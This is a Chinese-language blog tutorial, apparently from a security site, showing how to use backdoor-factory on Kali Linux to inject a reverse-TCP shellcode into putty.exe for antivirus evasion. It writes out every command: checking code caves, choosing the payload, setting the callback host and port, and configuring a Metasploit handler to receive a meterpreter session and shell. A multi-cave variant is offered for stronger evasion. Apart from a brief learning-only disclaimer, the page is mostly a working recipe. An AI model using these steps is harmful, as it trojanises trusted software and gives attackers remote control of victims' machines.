最新消息:

免杀后门(三)之backdoor-factory patch注入绕过

Kali Linux Eternal 2595浏览 0评论

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

backdoor-factory 看其名知其意,直译过来就是后门工厂的意思。利用其 patch 方式的编码加密技术,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果!下面,我们来看看如何在 kali 上使用它。

kali2.0 内已经集成了该款软件,如果找不到可以自己进行安装:

apt-get install backdoor-factory

20161011084041

使用起来也很简单,下面我已 putty.exe 这个软件为例。直接输入参数:

backdoor-factory -f putty.exe -S

-f:指定测试程序

-S:检查该程序是否支持 patch

20161011084805

从检查结果我们可以判定,putty.exe supported 支持 后门植入!

20161011084841

在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch 。

backdoor-factory -f putty.exe -c -l 200

-c:code cave(代码裂缝)

-l:代码裂缝大小

20161011085116

从检查结果可以看出,putty.exe 存在不少大于 200 字节的代码裂缝。

20161011085152

接下来我们继续检查 putty.exe 支持哪些 payload 的注入:

backdoor-factory -f putty.exe -s show

20161011085308

从检查结果可以看出其支持以下几种 payload 的注入:

20161011085330

接着我们就可以使用 -s 参数来进行选择 payload 并对其实现注入:

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444

-s:选择使用 payload 类型

-H:选择回连服务器地址

-P:回连服务器端口

20161011090241

当我们回车执行后,我们可以看到以下界面。这里要求我们选择 code cave ,我随便选择了一个 cave? 3? 回车。此时我们可以看到生成的文件,已被保存到了 backdoored 目录下!

20161011090403

我们 ls

cd backdoored/

ls

20161011090919

现在我们启动 MSF 并配置 handler :

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.135

set lport 4444

exploit

20161011091525

此时我在物理机上成功运行,经过注入的 putty.exe 程序后,可以看到 kali 的 MSF handler 已经成功获取 session!

shell (取得目标系统 shell )

20161011091655

以上 patch 方式为 单代码裂缝的注入,为了取得更好的免杀效果,我们还可以使用 多代码裂缝的方式进行注入!

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444 -J

-J:使用多代码裂缝注入

20161011094638

转载请注明:即刻安全 » 免杀后门(三)之backdoor-factory patch注入绕过

您必须 登录 才能发表评论!



合作伙伴